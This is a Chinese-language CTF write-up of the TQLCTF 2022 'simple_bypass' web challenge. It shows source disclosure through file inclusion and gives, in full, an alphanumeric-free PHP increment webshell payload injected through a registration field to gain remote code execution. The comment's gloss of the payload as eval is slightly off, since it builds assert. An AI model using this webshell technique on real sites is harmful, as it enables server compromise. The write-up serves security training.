[TQLCTF 2022]simple_bypass
文章目录
-
- 涉及知识点
- 解题过程
涉及知识点
- 无数字字母RCE
- 自增马构造
- 文件包含读取源码
解题过程
打开题目,随便注册一个用户为admin
登陆进去后,一眼发现杰哥图片有线索
![[TQLCTF 2022]simple_bypass_第1张图片](http://img.e-com-net.com/image/info8/bfaa50b079a54020829ba9b1099f41a3.jpg)
我们F12看一下如何请求的
在这里发现可能存在文件包含漏洞
![[TQLCTF 2022]simple_bypass_第2张图片](http://img.e-com-net.com/image/info8/44dbc84321d04497af03203f3af7bc04.jpg)
我们尝试读取下源码
./get_pic.php?image=index.php
然后base64解码一下,直接看核心部分
6){
echo("");
}
elseif(strlen($_POST['website']) > 25){
echo("");
}
elseif(strlen($_POST['punctuation']) > 1000){
echo("");
}
else{
if(preg_match('/[^\w\/\(\)\*<>]/', $_POST['user']) === 0){
if (preg_match('/[^\w\/\*:\.\;\(\)\n<>]/', $_POST['website']) === 0){
$_POST['punctuation'] = preg_replace("/[a-z,A-Z,0-9>\?]/","",$_POST['punctuation']);
$template = file_get_contents('./template.html');
$content = str_replace("__USER__", $_POST['user'], $template);
$content = str_replace("__PASS__", $hash_pass, $content);
$content = str_replace("__WEBSITE__", $_POST['website'], $content);
$content = str_replace("__PUNC__", $_POST['punctuation'], $content);
file_put_contents('sandbox/'.$hash_user.'.php', $content);
echo("");
}
else{
echo("");
}
}
else{
echo("");
}
}
}
else{
setcookie("user", $_POST['user'], time()+3600);
setcookie("pass", $hash_pass, time()+3600);
Header("Location:sandbox/$hash_user.php");
}
}
?>
在这里可以看到user,website都做了严格的过滤并且限制输入长度
但是观察到strlen($_POST['punctuation']) > 1000,猜测这是利用的突破口
观察到是无字母数字RCE,那么大概思路就是自增构造
我们再读取一下源码中的./template.html
解码完发现很长,这里只展示有用的部分
分析一下,(string)__USER__会将__USER__强转成string类型。
然后利用点已经知道是无数字字母RCE,被禁了,那么只能利用代码前面自带的去shell
我们选择可以利用注释符注释,然后用);闭合回去,__PUNC__写exp再把下面的注释掉。
具体执行如下
![[TQLCTF 2022]simple_bypass_第3张图片](http://img.e-com-net.com/image/info8/dce9df62445847bc8ad92ee6ab56ee40.jpg)
__PUNC__的exp
$_=[];$_=@"$_";$_=$_['!'=='@'];$___=$_;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$____='_';$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$_=$$____;$___($_[_]);
所以我们注册
//注册页面
user:a/*
passwd:a
website:a
punctuation:*/);$_=[];$_=@"$_";$_=$_['!'=='@'];$___=$_;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$____='_';$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$_=$$____;$___($_[_]);/*
//这个自增代表的是eval(@_POST[_]);
注册成功后,命令执行一下
![[TQLCTF 2022]simple_bypass_第4张图片](http://img.e-com-net.com/image/info8/65f34528a0cb47be9a7748149cbb945a.jpg)
回显在页面源代码最下面找到(报错无关紧要)
![[TQLCTF 2022]simple_bypass_第5张图片](http://img.e-com-net.com/image/info8/d2c9474cdbc2487fa0f63ea2e6e185b4.jpg)
得到flag
![[TQLCTF 2022]simple_bypass_第6张图片](http://img.e-com-net.com/image/info8/25c0b44b41a64ba8814ab3f6e146eaa5.jpg)